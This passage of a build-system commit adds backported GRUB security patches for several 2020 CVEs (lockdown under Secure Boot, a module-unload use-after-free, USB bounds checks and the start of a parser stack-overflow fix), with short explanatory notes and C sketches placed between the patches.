++ * Copyright (C) 2020 Free Software Foundation, Inc.
++ *
++ * GRUB is free software: you can redistribute it and/or modify
++ * it under the terms of the GNU General Public License as published by
++ * the Free Software Foundation, either version 3 of the License, or
++ * (at your option) any later version.
++ *
++ * GRUB is distributed in the hope that it will be useful,
++ * but WITHOUT ANY WARRANTY; without even the implied warranty of
++ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
++ * GNU General Public License for more details.
++ *
++ * You should have received a copy of the GNU General Public License
++ * along with GRUB. If not, see <http://www.gnu.org/licenses/>.
++ */
++
++#ifndef GRUB_LOCKDOWN_H
++#define GRUB_LOCKDOWN_H 1
++
++#include <grub/symbol.h>
++
++#define GRUB_LOCKDOWN_DISABLED 0
++#define GRUB_LOCKDOWN_ENABLED 1
++
++#ifdef GRUB_MACHINE_EFI
++extern void
++EXPORT_FUNC (grub_lockdown) (void);
++extern int
++EXPORT_FUNC (grub_is_lockdown) (void);
++#else
++static inline void
++grub_lockdown (void)
++{
++}
++
++static inline int
++grub_is_lockdown (void)
++{
++ return GRUB_LOCKDOWN_DISABLED;
++}
++#endif
++#endif /* ! GRUB_LOCKDOWN_H */
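The registration helpers added in this patch all follow one pattern: at
registration time, if lockdown is active, the real command handler is replaced
by a stub that returns an access-denied error, which is what
grub_register_command_lockdown() and grub_register_extcmd_lockdown() do. A
condensed sketch of that idea with invented names, not grub's command types:

    #include <stdio.h>

    typedef int (*cmd_func_t) (int argc, char **argv);

    static int lockdown_enabled;        /* illustrative flag, not grub's */

    static int deny_when_locked_down (int argc, char **argv)
    {
      (void) argc;
      (void) argv;
      fprintf (stderr, "command not allowed when lockdown is enforced\n");
      return -1;
    }

    /* Register-time swap: if locked down, install a stub that refuses to
       run instead of the real handler. */
    static cmd_func_t handler_for (cmd_func_t real)
    {
      return lockdown_enabled ? deny_when_locked_down : real;
    }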
diff --git a/meta/recipes-bsp/grub/files/CVE-2020-14372_3.patch b/meta/recipes-bsp/grub/files/CVE-2020-14372_3.patch
new file mode 100644
index 0000000000..93fdd2cb1a
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-14372_3.patch
@@ -0,0 +1,57 @@
+From bfb9c44298aa202c176fef8dc5ea48f9b0e76e5e Mon Sep 17 00:00:00 2001
+From: Javier Martinez Canillas <javierm@redhat.com>
+Date: Tue, 2 Feb 2021 19:59:48 +0100
+Subject: [PATCH] kern/lockdown: Set a variable if the GRUB is locked down
+
+It may be useful for scripts to determine whether the GRUB is locked
+down or not. Add the lockdown variable which is set to "y" when the GRUB
+is locked down.
+
+Suggested-by: Dimitri John Ledkov <xnox@ubuntu.com>
+Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=d90367471779c240e002e62edfb6b31fc85b4908]
+CVE: CVE-2020-14372
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ docs/grub.texi | 3 +++
+ grub-core/kern/lockdown.c | 4 ++++
+ 2 files changed, 7 insertions(+)
+
+diff --git a/docs/grub.texi b/docs/grub.texi
+index d778bfb..5e6cace 100644
+--- a/docs/grub.texi
++++ b/docs/grub.texi
+@@ -5802,6 +5802,9 @@ The GRUB can be locked down when booted on a secure boot environment, for exampl
+ if the UEFI secure boot is enabled. On a locked down configuration, the GRUB will
+ be restricted and some operations/commands cannot be executed.
+
++The @samp{lockdown} variable is set to @samp{y} when the GRUB is locked down.
++Otherwise it does not exit.
++
+ @node Platform limitations
+ @chapter Platform limitations
+
+diff --git a/grub-core/kern/lockdown.c b/grub-core/kern/lockdown.c
+index 1e56c0b..0bc70fd 100644
+--- a/grub-core/kern/lockdown.c
++++ b/grub-core/kern/lockdown.c
+@@ -18,6 +18,7 @@
+ */
+
+ #include <grub/dl.h>
++#include <grub/env.h>
+ #include <grub/file.h>
+ #include <grub/lockdown.h>
+ #include <grub/verify.h>
+@@ -71,6 +72,9 @@ grub_lockdown (void)
+ lockdown = GRUB_LOCKDOWN_ENABLED;
+
+ grub_verifier_register (&lockdown_verifier);
++
++ grub_env_set ("lockdown", "y");
++ grub_env_export ("lockdown");
+ }
+
+ int
diff --git a/meta/recipes-bsp/grub/files/CVE-2020-14372_4.patch b/meta/recipes-bsp/grub/files/CVE-2020-14372_4.patch
new file mode 100644
index 0000000000..ac509b63c7
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-14372_4.patch
@@ -0,0 +1,52 @@
+From 0d809c0979ced9db4d0e500b3e812bba95e52972 Mon Sep 17 00:00:00 2001
+From: Javier Martinez Canillas <javierm@redhat.com>
+Date: Mon, 28 Sep 2020 20:08:29 +0200
+Subject: [PATCH] efi: Lockdown the GRUB when the UEFI Secure Boot is enabled
+
+If the UEFI Secure Boot is enabled then the GRUB must be locked down
+to prevent executing code that can potentially be used to subvert its
+verification mechanisms.
+
+Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=98b00a403cbf2ba6833d1ac0499871b27a08eb77]
+CVE: CVE-2020-14372
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/kern/efi/init.c | 15 +++++++++++++++
+ 1 file changed, 15 insertions(+)
+
+diff --git a/grub-core/kern/efi/init.c b/grub-core/kern/efi/init.c
+index 3dfdf2d..db84d82 100644
+--- a/grub-core/kern/efi/init.c
++++ b/grub-core/kern/efi/init.c
+@@ -20,6 +20,7 @@
+ #include <grub/efi/efi.h>
+ #include <grub/efi/console.h>
+ #include <grub/efi/disk.h>
++#include <grub/lockdown.h>
+ #include <grub/term.h>
+ #include <grub/misc.h>
+ #include <grub/env.h>
+@@ -39,6 +40,20 @@ grub_efi_init (void)
+ /* Initialize the memory management system. */
+ grub_efi_mm_init ();
+
++ /*
++ * Lockdown the GRUB and register the shim_lock verifier
++ * if the UEFI Secure Boot is enabled.
++ */
++ if (grub_efi_secure_boot ())
++ {
++ grub_lockdown ();
++ /* NOTE: Our version does not have the shim_lock_verifier,
++ * need to update below if added */
++#if 0
++ grub_shim_lock_verifier_setup ();
++#endif
++ }
++
+ efi_call_4 (grub_efi_system_table->boot_services->set_watchdog_timer,
+ 0, 0, 0, NULL);
+
diff --git a/meta/recipes-bsp/grub/files/CVE-2020-14372_5.patch b/meta/recipes-bsp/grub/files/CVE-2020-14372_5.patch
new file mode 100644
index 0000000000..12ec4e1c17
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-14372_5.patch
@@ -0,0 +1,158 @@
+From 1ad728b08ba2a21573e5f81a565114f74ca33988 Mon Sep 17 00:00:00 2001
+From: Javier Martinez Canillas <javierm@redhat.com>
+Date: Mon, 28 Sep 2020 20:08:33 +0200
+Subject: [PATCH] efi: Use grub_is_lockdown() instead of hardcoding a disabled
+ modules list
+
+Now the GRUB can check if it has been locked down and this can be used to
+prevent executing commands that can be utilized to circumvent the UEFI
+Secure Boot mechanisms. So, instead of hardcoding a list of modules that
+have to be disabled, prevent the usage of commands that can be dangerous.
+
+This not only allows the commands to be disabled on other platforms, but
+also properly separates the concerns, since the shim_lock verifier logic
+should only be about preventing untrusted binaries from running and not
+about defining these kinds of policies.
+
+Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=8f73052885892bc0dbc01e297f79d7cf4925e491]
+CVE: CVE-2020-14372
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ docs/grub.texi | 10 ++++++++++
+ grub-core/commands/i386/wrmsr.c | 5 +++--
+ grub-core/commands/iorw.c | 19 ++++++++++---------
+ grub-core/commands/memrw.c | 19 ++++++++++---------
+ 4 files changed, 33 insertions(+), 20 deletions(-)
+
+diff --git a/docs/grub.texi b/docs/grub.texi
+index 5e6cace..0786427 100644
+--- a/docs/grub.texi
++++ b/docs/grub.texi
+@@ -5256,6 +5256,9 @@ only applies to the particular cpu/core/thread that runs the command.
+ Also, if you specify a reserved or unimplemented MSR address, it will
+ cause a general protection exception (which is not currently being handled)
+ and the system will reboot.
++
++Note: The command is not allowed when lockdown is enforced (@pxref{Lockdown}).
++ This is done to prevent subverting various security mechanisms.
+ @end deffn
+
+ @node xen_hypervisor
+@@ -5758,6 +5761,13 @@ security reasons. All above mentioned requirements are enforced by the
+ shim_lock module. And itself it is a persistent module which means that
+ it cannot be unloaded if it was loaded into the memory.
+
++All GRUB modules not stored in the @file{core.img}, OS kernels, ACPI tables,
++Device Trees, etc. have to be signed, e.g, using PGP. Additionally, the commands
++that can be used to subvert the UEFI secure boot mechanism, such as @command{iorw}
++and @command{memrw} will not be available when the UEFI secure boot is enabled.
++This is done for security reasons and are enforced by the GRUB Lockdown mechanism
++(@pxref{Lockdown}).
++
+ @node Measured Boot
+ @section Measuring boot components
+
+diff --git a/grub-core/commands/i386/wrmsr.c b/grub-core/commands/i386/wrmsr.c
+index 9c5e510..56a29c2 100644
+--- a/grub-core/commands/i386/wrmsr.c
++++ b/grub-core/commands/i386/wrmsr.c
+@@ -24,6 +24,7 @@
+ #include <grub/env.h>
+ #include <grub/command.h>
+ #include <grub/extcmd.h>
++#include <grub/lockdown.h>
+ #include <grub/i18n.h>
+ #include <grub/i386/cpuid.h>
+ #include <grub/i386/wrmsr.h>
+@@ -83,8 +84,8 @@ grub_cmd_msr_write (grub_command_t cmd __attribute__ ((unused)), int argc, char
+
+ GRUB_MOD_INIT(wrmsr)
+ {
+- cmd_write = grub_register_command ("wrmsr", grub_cmd_msr_write, N_("ADDR VALUE"),
+- N_("Write a value to a CPU model specific register."));
++ cmd_write = grub_register_command_lockdown ("wrmsr", grub_cmd_msr_write, N_("ADDR VALUE"),
++ N_("Write a value to a CPU model specific register."));
+ }
+
+ GRUB_MOD_FINI(wrmsr)
+diff --git a/grub-core/commands/iorw.c b/grub-core/commands/iorw.c
+index a0c164e..584baec 100644
+--- a/grub-core/commands/iorw.c
++++ b/grub-core/commands/iorw.c
+@@ -23,6 +23,7 @@
+ #include <grub/env.h>
+ #include <grub/cpu/io.h>
+ #include <grub/i18n.h>
++#include <grub/lockdown.h>
+
+ GRUB_MOD_LICENSE ("GPLv3+");
+
+@@ -131,17 +132,17 @@ GRUB_MOD_INIT(memrw)
+ N_("PORT"), N_("Read 32-bit value from PORT."),
+ options);
+ cmd_write_byte =
+- grub_register_command ("outb", grub_cmd_write,
+- N_("PORT VALUE [MASK]"),
+- N_("Write 8-bit VALUE to PORT."));
++ grub_register_command_lockdown ("outb", grub_cmd_write,
++ N_("PORT VALUE [MASK]"),
++ N_("Write 8-bit VALUE to PORT."));
+ cmd_write_word =
+- grub_register_command ("outw", grub_cmd_write,
+- N_("PORT VALUE [MASK]"),
+- N_("Write 16-bit VALUE to PORT."));
++ grub_register_command_lockdown ("outw", grub_cmd_write,
++ N_("PORT VALUE [MASK]"),
++ N_("Write 16-bit VALUE to PORT."));
+ cmd_write_dword =
+- grub_register_command ("outl", grub_cmd_write,
+- N_("ADDR VALUE [MASK]"),
+- N_("Write 32-bit VALUE to PORT."));
++ grub_register_command_lockdown ("outl", grub_cmd_write,
++ N_("ADDR VALUE [MASK]"),
++ N_("Write 32-bit VALUE to PORT."));
+ }
+
+ GRUB_MOD_FINI(memrw)
+diff --git a/grub-core/commands/memrw.c b/grub-core/commands/memrw.c
+index 98769ea..d401a6d 100644
+--- a/grub-core/commands/memrw.c
++++ b/grub-core/commands/memrw.c
+@@ -22,6 +22,7 @@
+ #include <grub/extcmd.h>
+ #include <grub/env.h>
+ #include <grub/i18n.h>
++#include <grub/lockdown.h>
+
+ GRUB_MOD_LICENSE ("GPLv3+");
+
+@@ -133,17 +134,17 @@ GRUB_MOD_INIT(memrw)
+ N_("ADDR"), N_("Read 32-bit value from ADDR."),
+ options);
+ cmd_write_byte =
+- grub_register_command ("write_byte", grub_cmd_write,
+- N_("ADDR VALUE [MASK]"),
+- N_("Write 8-bit VALUE to ADDR."));
++ grub_register_command_lockdown ("write_byte", grub_cmd_write,
++ N_("ADDR VALUE [MASK]"),
++ N_("Write 8-bit VALUE to ADDR."));
+ cmd_write_word =
+- grub_register_command ("write_word", grub_cmd_write,
+- N_("ADDR VALUE [MASK]"),
+- N_("Write 16-bit VALUE to ADDR."));
++ grub_register_command_lockdown ("write_word", grub_cmd_write,
++ N_("ADDR VALUE [MASK]"),
++ N_("Write 16-bit VALUE to ADDR."));
+ cmd_write_dword =
+- grub_register_command ("write_dword", grub_cmd_write,
+- N_("ADDR VALUE [MASK]"),
+- N_("Write 32-bit VALUE to ADDR."));
++ grub_register_command_lockdown ("write_dword", grub_cmd_write,
++ N_("ADDR VALUE [MASK]"),
++ N_("Write 32-bit VALUE to ADDR."));
+ }
+
+ GRUB_MOD_FINI(memrw)
diff --git a/meta/recipes-bsp/grub/files/CVE-2020-25632.patch b/meta/recipes-bsp/grub/files/CVE-2020-25632.patch
new file mode 100644
index 0000000000..0b37c72f0f
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-25632.patch
@@ -0,0 +1,90 @@
+From 7630ec5397fe418276b360f9011934b8c034936c Mon Sep 17 00:00:00 2001
+From: Javier Martinez Canillas <javierm@redhat.com>
+Date: Tue, 29 Sep 2020 14:08:55 +0200
+Subject: [PATCH] dl: Only allow unloading modules that are not dependencies
+
+When an attempt is made to remove a module, its reference counter is always
+decremented. This means that repeated rmmod invocations will cause the
+module to be unloaded even if another module depends on it.
+
+This may lead to a use-after-free scenario, allowing an attacker to execute
+arbitrary code and bypass the UEFI Secure Boot protection.
+
+While being there, add the extern keyword to some function declarations in
+that header file.
+
+Fixes: CVE-2020-25632
+
+Reported-by: Chris Coulson <chris.coulson@canonical.com>
+Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=7630ec5397fe418276b360f9011934b8c034936c]
+CVE: CVE-2020-25632
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/commands/minicmd.c | 7 +++++--
+ grub-core/kern/dl.c | 9 +++++++++
+ include/grub/dl.h | 8 +++++---
+ 3 files changed, 19 insertions(+), 5 deletions(-)
+
+diff --git a/grub-core/commands/minicmd.c b/grub-core/commands/minicmd.c
+index 6bbce3128..fa498931e 100644
+--- a/grub-core/commands/minicmd.c
++++ b/grub-core/commands/minicmd.c
+@@ -140,8 +140,11 @@ grub_mini_cmd_rmmod (struct grub_command *cmd __attribute__ ((unused)),
+ if (grub_dl_is_persistent (mod))
+ return grub_error (GRUB_ERR_BAD_ARGUMENT, "cannot unload persistent module");
+
+- if (grub_dl_unref (mod) <= 0)
+- grub_dl_unload (mod);
++ if (grub_dl_ref_count (mod) > 1)
++ return grub_error (GRUB_ERR_BAD_ARGUMENT, "cannot unload referenced module");
++
++ grub_dl_unref (mod);
++ grub_dl_unload (mod);
+
+ return 0;
+ }
+diff --git a/grub-core/kern/dl.c b/grub-core/kern/dl.c
+index 48eb5e7b6..48f8a7907 100644
+--- a/grub-core/kern/dl.c
++++ b/grub-core/kern/dl.c
+@@ -549,6 +549,15 @@ grub_dl_unref (grub_dl_t mod)
+ return --mod->ref_count;
+ }
+
++int
++grub_dl_ref_count (grub_dl_t mod)
++{
++ if (mod == NULL)
++ return 0;
++
++ return mod->ref_count;
++}
++
+ static void
+ grub_dl_flush_cache (grub_dl_t mod)
+ {
+diff --git a/include/grub/dl.h b/include/grub/dl.h
+index f03c03561..b3753c9ca 100644
+--- a/include/grub/dl.h
++++ b/include/grub/dl.h
+@@ -203,9 +203,11 @@ grub_dl_t EXPORT_FUNC(grub_dl_load) (const char *name);
+ grub_dl_t grub_dl_load_core (void *addr, grub_size_t size);
+ grub_dl_t EXPORT_FUNC(grub_dl_load_core_noinit) (void *addr, grub_size_t size);
+ int EXPORT_FUNC(grub_dl_unload) (grub_dl_t mod);
+-void grub_dl_unload_unneeded (void);
+-int EXPORT_FUNC(grub_dl_ref) (grub_dl_t mod);
+-int EXPORT_FUNC(grub_dl_unref) (grub_dl_t mod);
++extern void grub_dl_unload_unneeded (void);
++extern int EXPORT_FUNC(grub_dl_ref) (grub_dl_t mod);
++extern int EXPORT_FUNC(grub_dl_unref) (grub_dl_t mod);
++extern int EXPORT_FUNC(grub_dl_ref_count) (grub_dl_t mod);
++
+ extern grub_dl_t EXPORT_VAR(grub_dl_head);
+
+ #ifndef GRUB_UTIL
+--
+2.33.0
+
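The fix above works by refusing to unload a module whose reference count shows it is still needed by others. A rough standalone illustration of that pattern (plain C, not GRUB code; the structure and function names are invented for the example):

#include <stdio.h>

struct module {
  const char *name;
  int ref_count;                  /* how many users still depend on this module */
};

/* Refuse to unload while anything else still holds a reference, so a
 * dependent module can never be left pointing at freed memory. */
static int module_try_unload (struct module *mod)
{
  if (mod == NULL || mod->ref_count > 1)
    return -1;                    /* still referenced: keep it loaded */

  mod->ref_count = 0;
  printf ("unloading %s\n", mod->name);   /* real code would free its segments here */
  return 0;
}

int main (void)
{
  struct module m = { "example", 2 };

  if (module_try_unload (&m) != 0)
    printf ("%s is still referenced, not unloaded\n", m.name);
  return 0;
}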
diff --git a/meta/recipes-bsp/grub/files/CVE-2020-25647.patch b/meta/recipes-bsp/grub/files/CVE-2020-25647.patch
new file mode 100644
index 0000000000..cb77fd4772
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-25647.patch
@@ -0,0 +1,119 @@
+From 128c16a682034263eb519c89bc0934eeb6fa8cfa Mon Sep 17 00:00:00 2001
+From: Javier Martinez Canillas <javierm@redhat.com>
+Date: Fri, 11 Dec 2020 19:19:21 +0100
+Subject: [PATCH] usb: Avoid possible out-of-bound accesses caused by malicious
+ devices
+
+The maximum numbers of configurations and interfaces are fixed, but there is
+no out-of-bounds checking to prevent a malicious USB device from reporting
+large values for these and causing accesses outside the arrays' memory.
+
+Fixes: CVE-2020-25647
+
+Reported-by: Joseph Tartaro <joseph.tartaro@ioactive.com>
+Reported-by: Ilja Van Sprundel <ivansprundel@ioactive.com>
+Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=128c16a682034263eb519c89bc0934eeb6fa8cfa]
+CVE: CVE-2020-25647
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/bus/usb/usb.c | 15 ++++++++++++---
+ include/grub/usb.h | 10 +++++++---
+ 2 files changed, 19 insertions(+), 6 deletions(-)
+
+diff --git a/grub-core/bus/usb/usb.c b/grub-core/bus/usb/usb.c
+index 8da5e4c74..7cb3cc230 100644
+--- a/grub-core/bus/usb/usb.c
++++ b/grub-core/bus/usb/usb.c
+@@ -75,6 +75,9 @@ grub_usb_controller_iterate (grub_usb_controller_iterate_hook_t hook,
+ grub_usb_err_t
+ grub_usb_clear_halt (grub_usb_device_t dev, int endpoint)
+ {
++ if (endpoint >= GRUB_USB_MAX_TOGGLE)
++ return GRUB_USB_ERR_BADDEVICE;
++
+ dev->toggle[endpoint] = 0;
+ return grub_usb_control_msg (dev, (GRUB_USB_REQTYPE_OUT
+ | GRUB_USB_REQTYPE_STANDARD
+@@ -134,10 +137,10 @@ grub_usb_device_initialize (grub_usb_device_t dev)
+ return err;
+ descdev = &dev->descdev;
+
+- for (i = 0; i < 8; i++)
++ for (i = 0; i < GRUB_USB_MAX_CONF; i++)
+ dev->config[i].descconf = NULL;
+
+- if (descdev->configcnt == 0)
++ if (descdev->configcnt == 0 || descdev->configcnt > GRUB_USB_MAX_CONF)
+ {
+ err = GRUB_USB_ERR_BADDEVICE;
+ goto fail;
+@@ -172,6 +175,12 @@ grub_usb_device_initialize (grub_usb_device_t dev)
+ /* Skip the configuration descriptor. */
+ pos = dev->config[i].descconf->length;
+
++ if (dev->config[i].descconf->numif > GRUB_USB_MAX_IF)
++ {
++ err = GRUB_USB_ERR_BADDEVICE;
++ goto fail;
++ }
++
+ /* Read all interfaces. */
+ for (currif = 0; currif < dev->config[i].descconf->numif; currif++)
+ {
+@@ -217,7 +226,7 @@ grub_usb_device_initialize (grub_usb_device_t dev)
+
+ fail:
+
+- for (i = 0; i < 8; i++)
++ for (i = 0; i < GRUB_USB_MAX_CONF; i++)
+ grub_free (dev->config[i].descconf);
+
+ return err;
+diff --git a/include/grub/usb.h b/include/grub/usb.h
+index 512ae1dd0..6475c552f 100644
+--- a/include/grub/usb.h
++++ b/include/grub/usb.h
+@@ -23,6 +23,10 @@
+ #include <grub/usbdesc.h>
+ #include <grub/usbtrans.h>
+
++#define GRUB_USB_MAX_CONF 8
++#define GRUB_USB_MAX_IF 32
++#define GRUB_USB_MAX_TOGGLE 256
++
+ typedef struct grub_usb_device *grub_usb_device_t;
+ typedef struct grub_usb_controller *grub_usb_controller_t;
+ typedef struct grub_usb_controller_dev *grub_usb_controller_dev_t;
+@@ -167,7 +171,7 @@ struct grub_usb_configuration
+ struct grub_usb_desc_config *descconf;
+
+ /* Interfaces associated to this configuration. */
+- struct grub_usb_interface interf[32];
++ struct grub_usb_interface interf[GRUB_USB_MAX_IF];
+ };
+
+ struct grub_usb_hub_port
+@@ -191,7 +195,7 @@ struct grub_usb_device
+ struct grub_usb_controller controller;
+
+ /* Device configurations (after opening the device). */
+- struct grub_usb_configuration config[8];
++ struct grub_usb_configuration config[GRUB_USB_MAX_CONF];
+
+ /* Device address. */
+ int addr;
+@@ -203,7 +207,7 @@ struct grub_usb_device
+ int initialized;
+
+ /* Data toggle values (used for bulk transfers only). */
+- int toggle[256];
++ int toggle[GRUB_USB_MAX_TOGGLE];
+
+ /* Used by libusb wrapper. Schedulded for removal. */
+ void *data;
+--
+2.33.0
+
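The patch is an instance of validating device-supplied counts against fixed array bounds before indexing. A standalone sketch of the same check (plain C, not the GRUB USB stack; names invented for the example):

#include <stdio.h>

#define MAX_CONF 8

static int config_ids[MAX_CONF];

/* count comes from an untrusted descriptor; reject anything that would
 * index past the fixed-size array instead of trusting the device. */
static int read_configs (unsigned int count)
{
  unsigned int i;

  if (count == 0 || count > MAX_CONF)
    return -1;                       /* bad device */

  for (i = 0; i < count; i++)
    config_ids[i] = (int) i;         /* safe: i < MAX_CONF is guaranteed */
  return 0;
}

int main (void)
{
  printf ("count 300 -> %d\n", read_configs (300));  /* rejected */
  printf ("count 4   -> %d\n", read_configs (4));    /* accepted */
  return 0;
}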
diff --git a/meta/recipes-bsp/grub/files/CVE-2020-27749.patch b/meta/recipes-bsp/grub/files/CVE-2020-27749.patch
new file mode 100644
index 0000000000..a2566b2ded
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-27749.patch
@@ -0,0 +1,609 @@
+From 4ea7bae51f97e49c84dc67ea30b466ca8633b9f6 Mon Sep 17 00:00:00 2001
+From: Chris Coulson <chris.coulson@canonical.com>
+Date: Thu, 7 Jan 2021 19:21:03 +0000
+Subject: kern/parser: Fix a stack buffer overflow
+
+grub_parser_split_cmdline() expands variable names present in the supplied
+command line into their corresponding variable contents and uses a 1 kiB
+stack buffer for temporary storage without sufficient bounds checking. If
+the function is called with a command line that references a variable with
+a sufficiently large payload, it is possible to overflow the stack
+buffer via tab completion, corrupt the stack frame and potentially
+control execution.
+
+Fixes: CVE-2020-27749
+
+Reported-by: Chris Coulson <chris.coulson@canonical.com>
+Signed-off-by: Chris Coulson <chris.coulson@canonical.com>
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?h=grub-2.06&id=c6c426e5ab6ea715153b72584de6bd8c82f698ec && https://git.savannah.gnu.org/cgit/grub.git/commit/?h=grub-2.06&id=b1c9e9e889e4273fb15712051c887e6078511448 && https://git.savannah.gnu.org/cgit/grub.git/commit/?h=grub-2.06&id=3d157bbd06506b170fde5ec23980c4bf9f7660e2 && https://git.savannah.gnu.org/cgit/grub.git/commit/?h=grub-2.06&id=8bc817014ce3d7a498db44eae33c8b90e2430926 && https://git.savannah.gnu.org/cgit/grub.git/commit/?h=grub-2.06&id=030fb6c4fa354cdbd6a8d6903dfed5d36eaf3cb2 && https://git.savannah.gnu.org/cgit/grub.git/commit/?h=grub-2.06&id=4ea7bae51f97e49c84dc67ea30b466ca8633b9f6]
+CVE: CVE-2020-27749
+
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ grub-core/Makefile.core.def | 1 +
+ grub-core/kern/buffer.c | 117 +++++++++++++++++++++
+ grub-core/kern/parser.c | 204 +++++++++++++++++++++++-------------
+ include/grub/buffer.h | 144 +++++++++++++++++++++++++
+ 4 files changed, 395 insertions(+), 71 deletions(-)
+ create mode 100644 grub-core/kern/buffer.c
+ create mode 100644 include/grub/buffer.h
+
+diff --git a/grub-core/Makefile.core.def b/grub-core/Makefile.core.def
+index 651ea2a..823cd57 100644
+--- a/grub-core/Makefile.core.def
++++ b/grub-core/Makefile.core.def
+@@ -123,6 +123,7 @@ kernel = {
+ riscv32_efi_startup = kern/riscv/efi/startup.S;
+ riscv64_efi_startup = kern/riscv/efi/startup.S;
+
++ common = kern/buffer.c;
+ common = kern/command.c;
+ common = kern/corecmd.c;
+ common = kern/device.c;
+diff --git a/grub-core/kern/buffer.c b/grub-core/kern/buffer.c
+new file mode 100644
+index 0000000..9f5f8b8
+--- /dev/null
++++ b/grub-core/kern/buffer.c
+@@ -0,0 +1,117 @@
++/*
++ * GRUB -- GRand Unified Bootloader
++ * Copyright (C) 2021 Free Software Foundation, Inc.
++ *
++ * GRUB is free software: you can redistribute it and/or modify
++ * it under the terms of the GNU General Public License as published by
++ * the Free Software Foundation, either version 3 of the License, or
++ * (at your option) any later version.
++ *
++ * GRUB is distributed in the hope that it will be useful,
++ * but WITHOUT ANY WARRANTY; without even the implied warranty of
++ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
++ * GNU General Public License for more details.
++ *
++ * You should have received a copy of the GNU General Public License
++ * along with GRUB. If not, see <http://www.gnu.org/licenses/>.
++ */
++
++#include <grub/buffer.h>
++#include <grub/err.h>
++#include <grub/misc.h>
++#include <grub/mm.h>
++#include <grub/safemath.h>
++#include <grub/types.h>
++
++grub_buffer_t
++grub_buffer_new (grub_size_t sz)
++{
++ struct grub_buffer *ret;
++
++ ret = (struct grub_buffer *) grub_malloc (sizeof (*ret));
++ if (ret == NULL)
++ return NULL;
++
++ ret->data = (grub_uint8_t *) grub_malloc (sz);
++ if (ret->data == NULL)
++ {
++ grub_free (ret);
++ return NULL;
++ }
++
++ ret->sz = sz;
++ ret->pos = 0;
++ ret->used = 0;
++
++ return ret;
++}
++
++void
++grub_buffer_free (grub_buffer_t buf)
++{
++ grub_free (buf->data);
++ grub_free (buf);
++}
++
++grub_err_t
++grub_buffer_ensure_space (grub_buffer_t buf, grub_size_t req)
++{
++ grub_uint8_t *d;
++ grub_size_t newsz = 1;
++
++ /* Is the current buffer size adequate? */
++ if (buf->sz >= req)
++ return GRUB_ERR_NONE;
++
++ /* Find the smallest power-of-2 size that satisfies the request. */
++ while (newsz < req)
++ {
++ if (newsz == 0)
++ return grub_error (GRUB_ERR_OUT_OF_RANGE,
++ N_("requested buffer size is too large"));
++ newsz <<= 1;
++ }
++
++ d = (grub_uint8_t *) grub_realloc (buf->data, newsz);
++ if (d == NULL)
++ return grub_errno;
++
++ buf->data = d;
++ buf->sz = newsz;
++
++ return GRUB_ERR_NONE;
++}
++
++void *
++grub_buffer_take_data (grub_buffer_t buf)
++{
++ void *data = buf->data;
++
++ buf->data = NULL;
++ buf->sz = buf->pos = buf->used = 0;
++
++ return data;
++}
++
++void
++grub_buffer_reset (grub_buffer_t buf)
++{
++ buf->pos = buf->used = 0;
++}
++
++grub_err_t
++grub_buffer_advance_read_pos (grub_buffer_t buf, grub_size_t n)
++{
++ grub_size_t newpos;
++
++ if (grub_add (buf->pos, n, &newpos))
++ return grub_error (GRUB_ERR_OUT_OF_RANGE, N_("overflow is detected"));
++
++ if (newpos > buf->used)
++ return grub_error (GRUB_ERR_OUT_OF_RANGE,
++ N_("new read is position beyond the end of the written data"));
++
++ buf->pos = newpos;
++
++ return GRUB_ERR_NONE;
++}
+diff --git a/grub-core/kern/parser.c b/grub-core/kern/parser.c
+index d1cf061..6ab7aa4 100644
+--- a/grub-core/kern/parser.c
++++ b/grub-core/kern/parser.c
+@@ -1,7 +1,7 @@
+ /* parser.c - the part of the parser that can return partial tokens */
+ /*
+ * GRUB -- GRand Unified Bootloader
+- * Copyright (C) 2005,2007,2009 Free Software Foundation, Inc.
++ * Copyright (C) 2005,2007,2009,2021 Free Software Foundation, Inc.
+ *
+ * GRUB is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+@@ -18,6 +18,7 @@
+ */
+
+ #include <grub/parser.h>
++#include <grub/buffer.h>
+ #include <grub/env.h>
+ #include <grub/misc.h>
+ #include <grub/mm.h>
+@@ -107,8 +108,8 @@ check_varstate (grub_parser_state_t s)
+ }
+
+
+-static void
+-add_var (char *varname, char **bp, char **vp,
++static grub_err_t
++add_var (grub_buffer_t varname, grub_buffer_t buf,
+ grub_parser_state_t state, grub_parser_state_t newstate)
+ {
+ const char *val;
